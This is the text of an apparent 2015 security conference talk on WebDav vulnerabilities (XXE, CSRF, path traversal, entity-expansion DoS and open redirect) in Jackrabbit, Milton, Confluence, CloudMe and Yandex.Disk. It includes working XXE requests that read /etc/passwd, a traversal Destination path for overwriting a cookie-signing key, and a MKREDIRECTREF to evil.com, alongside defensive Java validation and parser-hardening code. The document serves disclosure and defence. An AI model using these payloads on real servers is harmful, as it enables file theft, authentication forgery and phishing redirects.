2015 
Vulnerabilities in various WebDav implementations 


What should a hacker know about WebDav? 
Short BIO — Mikhail Egorov


Application Security Engineer at Odin [ http://www.odin.com ] 


Security researcher and bug hunter 
Graduated from BMSTU with MSc. in Information Security [ IU8 ] 
Holds OSCP and CISSP certificates 


See my blog [ http://0ang3el.blogspot.com ] 
WebDav is complex


> Many standards prescribe how to implement the various WebDav methods:
  RFC 4918, RFC 3253, RFC 3648, RFC 3744, RFC 5323, RFC 4437, RFC 5842


> Many WebDav methods 


  OPTIONS, TRACE, GET, HEAD, POST, PUT, DELETE, COPY, MOVE, PROPPATCH,
  PROPFIND, MKCOL, LOCK, UNLOCK, SEARCH, BIND, UNBIND, REBIND,
  MKREDIRECTREF, UPDATEREDIRECTREF, ORDERPATCH, ACL, REPORT


> Different WebDav implementations


www.zeronights.org 


Generic approach 
> Try various XXE attacks


> Issue OPTIONS requests and see which "interesting" methods are supported by the WebDav library

> Try attacks that follow from the security considerations sections of the RFCs and from "common sense" for all "interesting" methods

> Review the source code, if available, to find various implementation flaws
WebDav XXE attacks


> Methods PROPPATCH, PROPFIND, LOCK, etc. accept XML as input 


> Java implementations are especially vulnerable




Apache Jackrabbit WebDav XXE


> CVE-2015-1833 [ http://www.securityfocus.com/archive/1/535582 ]
> Exploit code [ https://www.exploit-db.com/exploits/37110/ ]
> Video PoC [ https://www.youtube.com/watch?v=Hg3AXo0G89Gs ]
> CVE-2015-7326 [ http://www.securityfocus.com/archive/1/536813 ]


cloudme.com XXE


> CloudMe is a secure European service that makes your life a little bit easier. With CloudMe you don't have to think twice about where your files are, they're always with you ...

> https://webdav.cloudme.com is a vulnerable WebDav endpoint
Apache Sling OOXML parsing XXE

> Apache Tika OSGi bundle is used to parse documents
> Apache POI is used to parse OOXML documents
> Apache POI library XXE [ https://access.redhat.com/security/cve/CVE-2014-3529 ]
Apache Jackrabbit WebDav CSRF

> JCR-3909 [ https://issues.apache.org/jira/browse/JCR-3909 ]
> POST request is allowed and treated as PUT
> There is Referer-based CSRF protection, but an empty Referer bypasses it

> Could be used to mount an XXE attack against systems in the internal network!
Exploiting WebDav XXE tricks

> Create resource

PUT /resource HTTP/1.1

Hack

> Write the content of the file to a property of the resource with the PROPPATCH method

PROPPATCH /resource HTTP/1.1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE propertyupdate [
<!ENTITY loot SYSTEM "file:///etc/passwd"> ]>
<D:propertyupdate xmlns:D="DAV:"><D:set><D:prop>
<a xmlns="http://this.is.xxe.baby">&loot;</a>
</D:prop></D:set></D:propertyupdate>
Exploiting WebDav XXE tricks

> Read the property holding the content of the file with the PROPFIND method

PROPFIND /resource HTTP/1.1

<?xml version="1.0" encoding="UTF-8"?>
<propfind xmlns="DAV:"><prop>
<q:a xmlns:q="http://this.is.xxe.baby"/>
</prop></propfind>
> OOB XXE will work with any method that supports XML input
  - when general external entities are prohibited

> SSRF attack will work with any method that supports XML input
  - when only external DTDs are allowed
> Cookie AUTHN [ preferred method in Windows, from Win7 ]
  - miltonUserUrl=/users/admin/;Path=/;Expires=Thu, 06-Mar-2014 20:55:23 GMT;Max-Age=31536000
  - miltonUserUrlHash=0.884150694443924:9c74dc9fb62c2926c911ce07b5e7dcb2;Path=/;Expires=Thu, 06-Mar-2014 20:55:23 GMT;Max-Age=31536000;HttpOnly

> Cookie is signed using HMAC-SHA1
  - key is in keys.txt file stored in java.io.tmpdir directory

> Path traversal in Destination header of MOVE and COPY requests
  - http://127.0.0.1:8080/../../../../../../../../../../_DAV/HACK/tmp
  - We can overwrite keys.txt file
  - After app server restart we can craft valid cookies
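A defensive counterpart to the Destination traversal above, as an added example that is not Milton's own code: resolve the MOVE/COPY Destination header against the DAV root and reject anything that leaves the served origin or the root. The class, method and parameter names, the /dav URL prefix and the /srv/dav root are assumptions.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.nio.file.Path;
import java.nio.file.Paths;

/** Added example, not Milton code: confine a MOVE/COPY Destination to the DAV root. */
public final class DavDestination {

    /**
     * Maps a Destination header to a file under davRoot, or returns null when the
     * header leaves the served origin or escapes the DAV root (names are assumptions).
     */
    public static Path resolve(String destination, String expectedHost, int expectedPort,
                               String davUrlPrefix, Path davRoot) {
        URI uri;
        try {
            uri = new URI(destination);
        } catch (URISyntaxException e) {
            return null;                                   // not a syntactically valid URI
        }
        // RFC 4918 section 10.3: Destination is an absolute URI; keep it on this server.
        int port = uri.getPort() != -1 ? uri.getPort()
                 : "https".equalsIgnoreCase(uri.getScheme()) ? 443 : 80;
        if (uri.getHost() == null || !uri.getHost().equalsIgnoreCase(expectedHost)
                || port != expectedPort) {
            return null;
        }
        // Collapse literal "." and ".." segments; the slide's /../../_DAV/HACK/tmp
        // can never land under the prefix afterwards, so it fails the check below.
        String path = uri.normalize().getPath();
        if (path == null || !path.startsWith(davUrlPrefix + "/")) {
            return null;                                   // outside the DAV URL space
        }
        // getPath() percent-decodes, so %2e%2e has become ".." here; the
        // filesystem-level normalize + startsWith catches that variant.
        String relative = path.substring(davUrlPrefix.length() + 1);
        Path target = davRoot.resolve(relative).normalize();
        return target.startsWith(davRoot) ? target : null;
    }

    public static void main(String[] args) {
        Path root = Paths.get("/srv/dav").toAbsolutePath().normalize();      // constructed root
        String[] samples = {
            "http://127.0.0.1:8080/dav/docs/report.txt",                             // legitimate
            "http://127.0.0.1:8080/../../../../../../../../../../_DAV/HACK/tmp",    // from the slide
            "http://127.0.0.1:8080/dav/%2e%2e/%2e%2e/tmp/keys.txt",                  // encoded traversal
            "http://other.example:8080/dav/x.txt"                                    // foreign host
        };
        for (String s : samples) {
            System.out.println(s + " -> " + resolve(s, "127.0.0.1", 8080, "/dav", root));
        }
    }
}
```

Only the first sample resolves to a path; the other three print null.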
Confluence WebDav DoS attack

> Based on Apache Jackrabbit WebDav code
> Supports Depth: infinity header in PROPFIND request
> Allows DOCTYPE declaration
> Billion Laughs-like attack, but with a limited number [ 64000 ] of entity expansions, is possible
> Xerces-J library vulnerable to CVE-2013-4002 has been used
> https://jira.atlassian.com/browse/CONF-37991
Yandex.Disk unvalidated redirect

> WebDav access to Yandex.Disk — http://webdav.yandex.ru
> Supports MKREDIRECTREF request
> It is possible to create a resource that will redirect the victim from Yandex.Disk to an arbitrary site

MKREDIRECTREF /good.txt HTTP/1.1
Host: webdav.yandex.ru

<?xml version="1.0" encoding="utf-8" ?>
<D:mkredirectref xmlns:D="DAV:">
<D:reftarget>
<D:href>http://evil.com</D:href>
</D:reftarget>
</D:mkredirectref>
Takeaways

> WebDav is a complex protocol; it extends the attack surface of your system

> WebDav-related RFCs have security considerations sections; unfortunately, many WebDav implementations ignore those security considerations

> WebDav libraries in Java suffer from XXE issues, because most XML parsers in Java are insecure in their default configuration
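The fix behind the XXE tricks, the Confluence entity-expansion DoS and the last takeaway, as an added example that is not code from Jackrabbit, Milton, Confluence or the talk: a JDK DocumentBuilderFactory hardened before it ever sees a PROPPATCH or PROPFIND body. The class and method names are assumptions; the feature URIs are the standard Xerces/JAXP ones.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

/** Added example, not Jackrabbit/Milton/Confluence code: a hardened DOM parser for WebDav bodies. */
public final class SafeDavXml {

    /** Factory that refuses any DOCTYPE and never fetches external entities or DTDs. */
    public static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setNamespaceAware(true);   // PROPFIND/PROPPATCH bodies use the DAV: namespace
        // One switch removes the external entity (&loot;), OOB, SSRF-via-DTD and
        // Billion Laughs payloads alike: no DOCTYPE means no entity declarations at all.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth in case a DOCTYPE is ever allowed again.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        // Also enforces the JDK entity-expansion limit (64000 by default).
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f;
    }

    /** Parses one request body; any DOCTYPE makes the parser throw SAXException. */
    public static Document parse(String body)
            throws ParserConfigurationException, SAXException, IOException {
        DocumentBuilder b = hardenedFactory().newDocumentBuilder();
        return b.parse(new InputSource(new StringReader(body)));
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample: the PROPPATCH body from the slides, with its SYSTEM entity.
        String xxe = "<?xml version=\"1.0\"?><!DOCTYPE propertyupdate ["
                + "<!ENTITY loot SYSTEM \"file:///etc/passwd\">]>"
                + "<D:propertyupdate xmlns:D=\"DAV:\"><D:set><D:prop>"
                + "<a xmlns=\"http://this.is.xxe.baby\">&loot;</a></D:prop></D:set></D:propertyupdate>";
        try { parse(xxe); System.out.println("xxe body parsed (should not happen)"); }
        catch (SAXException e) { System.out.println("xxe body rejected: " + e.getMessage()); }
        // A plain PROPFIND body without a DOCTYPE is still accepted.
        Document ok = parse("<D:propfind xmlns:D=\"DAV:\"><D:prop><D:displayname/></D:prop></D:propfind>");
        System.out.println("plain body accepted: " + ok.getDocumentElement().getTagName());
    }
}
```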